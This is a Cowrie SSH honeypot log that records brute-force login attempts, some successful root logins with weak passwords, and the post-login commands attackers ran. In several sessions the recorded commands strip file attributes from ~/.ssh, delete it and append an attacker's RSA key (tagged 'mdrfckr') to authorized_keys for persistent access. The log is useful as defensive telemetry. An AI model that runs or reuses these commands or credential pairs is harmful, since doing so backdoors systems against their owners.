{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:01.725471Z","src_ip":"51.250.72.176","session":"43f9214859b6"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":41838,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b8326c911de","protocol":"ssh","message":"New connection: 51.250.72.176:41838 (1.2.3.4:22) [session: 8b8326c911de]","sensor":"my-vps","timestamp":"2025-09-09T00:44:01.763849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:44:01.764912Z","src_ip":"51.250.72.176","session":"8b8326c911de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:44:01.804923Z","src_ip":"51.250.72.176","session":"8b8326c911de"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:44:02.006084Z","src_ip":"51.250.72.176","session":"8b8326c911de"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":60932,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbc11833f26c","protocol":"ssh","message":"New connection: 5.202.105.236:60932 (1.2.3.4:22) [session: fbc11833f26c]","sensor":"my-vps","timestamp":"2025-09-09T00:44:02.734229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:44:02.739020Z","src_ip":"5.202.105.236","session":"fbc11833f26c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:44:02.887035Z","src_ip":"5.202.105.236","session":"fbc11833f26c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:03.049020Z","src_ip":"51.250.72.176","session":"8b8326c911de"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":42220,"dst_ip":"1.2.3.4","dst_port":22,"session":"e85639482d84","protocol":"ssh","message":"New connection: 51.250.72.176:42220 (1.2.3.4:22) [session: e85639482d84]","sensor":"my-vps","timestamp":"2025-09-09T00:44:03.071451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:44:03.072965Z","src_ip":"51.250.72.176","session":"e85639482d84"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:44:03.103917Z","src_ip":"51.250.72.176","session":"e85639482d84"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:44:03.270202Z","src_ip":"51.250.72.176","session":"e85639482d84"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":38100,"dst_ip":"1.2.3.4","dst_port":22,"session":"943d16b14f85","protocol":"ssh","message":"New connection: 43.156.132.147:38100 (1.2.3.4:22) [session: 943d16b14f85]","sensor":"my-vps","timestamp":"2025-09-09T00:44:03.274181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:44:03.274729Z","src_ip":"43.156.132.147","session":"943d16b14f85"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:03.302546Z","src_ip":"51.250.72.176","session":"e85639482d84"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:03.310432Z","src_ip":"51.250.72.176","session":"43f9214859b6"}
{"eventid":"cowrie.login.failed","username":"data","password":"qwerty","message":"login attempt [data/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T00:44:03.481849Z","src_ip":"5.202.105.236","session":"fbc11833f26c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:44:03.531142Z","src_ip":"43.156.132.147","session":"943d16b14f85"}
{"eventid":"cowrie.login.success","username":"root","password":"123Net","message":"login attempt [root/123Net] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:44:04.627204Z","src_ip":"43.156.132.147","session":"943d16b14f85"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:04.631309Z","src_ip":"5.202.105.236","session":"fbc11833f26c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:44:05.200994Z","src_ip":"43.156.132.147","session":"943d16b14f85"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:44:05.201721Z","src_ip":"43.156.132.147","session":"943d16b14f85"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:44:05.203193Z","src_ip":"43.156.132.147","session":"943d16b14f85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:05.465397Z","src_ip":"43.156.132.147","session":"943d16b14f85"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:44:06.009852Z","src_ip":"43.156.132.147","session":"943d16b14f85"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:44:06.010684Z","src_ip":"43.156.132.147","session":"943d16b14f85"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:44:06.265730Z","src_ip":"43.156.132.147","session":"943d16b14f85"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:06.266700Z","src_ip":"43.156.132.147","session":"943d16b14f85"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":38108,"dst_ip":"1.2.3.4","dst_port":22,"session":"76919f0dc571","protocol":"ssh","message":"New connection: 43.156.132.147:38108 (1.2.3.4:22) [session: 76919f0dc571]","sensor":"my-vps","timestamp":"2025-09-09T00:44:06.519403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:44:06.520156Z","src_ip":"43.156.132.147","session":"76919f0dc571"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:44:06.774493Z","src_ip":"43.156.132.147","session":"76919f0dc571"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:44:07.837750Z","src_ip":"43.156.132.147","session":"76919f0dc571"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:09.094077Z","src_ip":"43.156.132.147","session":"76919f0dc571"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":59278,"dst_ip":"1.2.3.4","dst_port":22,"session":"041eee8c7fbb","protocol":"ssh","message":"New connection: 43.156.132.147:59278 (1.2.3.4:22) [session: 041eee8c7fbb]","sensor":"my-vps","timestamp":"2025-09-09T00:44:09.338095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:44:09.338910Z","src_ip":"43.156.132.147","session":"041eee8c7fbb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:44:09.584191Z","src_ip":"43.156.132.147","session":"041eee8c7fbb"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":58083,"dst_ip":"1.2.3.4","dst_port":22,"session":"192ee5951de3","protocol":"ssh","message":"New connection: 103.100.209.195:58083 (1.2.3.4:22) [session: 192ee5951de3]","sensor":"my-vps","timestamp":"2025-09-09T00:44:09.701507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:44:09.709166Z","src_ip":"103.100.209.195","session":"192ee5951de3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:44:09.906539Z","src_ip":"103.100.209.195","session":"192ee5951de3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:44:10.606138Z","src_ip":"43.156.132.147","session":"041eee8c7fbb"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"12345678","message":"login attempt [nginx/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T00:44:10.699340Z","src_ip":"103.100.209.195","session":"192ee5951de3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:10.852691Z","src_ip":"43.156.132.147","session":"041eee8c7fbb"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:10.853547Z","src_ip":"43.156.132.147","session":"943d16b14f85"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:11.905049Z","src_ip":"103.100.209.195","session":"192ee5951de3"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":60186,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6faad5c4960","protocol":"ssh","message":"New connection: 152.32.129.236:60186 (1.2.3.4:22) [session: b6faad5c4960]","sensor":"my-vps","timestamp":"2025-09-09T00:44:36.203083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:44:36.203921Z","src_ip":"152.32.129.236","session":"b6faad5c4960"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:44:36.463958Z","src_ip":"152.32.129.236","session":"b6faad5c4960"}
{"eventid":"cowrie.login.success","username":"root","password":"P@$$w0rD","message":"login attempt [root/P@$$w0rD] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:44:37.544658Z","src_ip":"152.32.129.236","session":"b6faad5c4960"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:44:38.116440Z","src_ip":"152.32.129.236","session":"b6faad5c4960"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:44:38.117292Z","src_ip":"152.32.129.236","session":"b6faad5c4960"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:44:38.118485Z","src_ip":"152.32.129.236","session":"b6faad5c4960"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:38.379864Z","src_ip":"152.32.129.236","session":"b6faad5c4960"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:44:38.963891Z","src_ip":"152.32.129.236","session":"b6faad5c4960"}
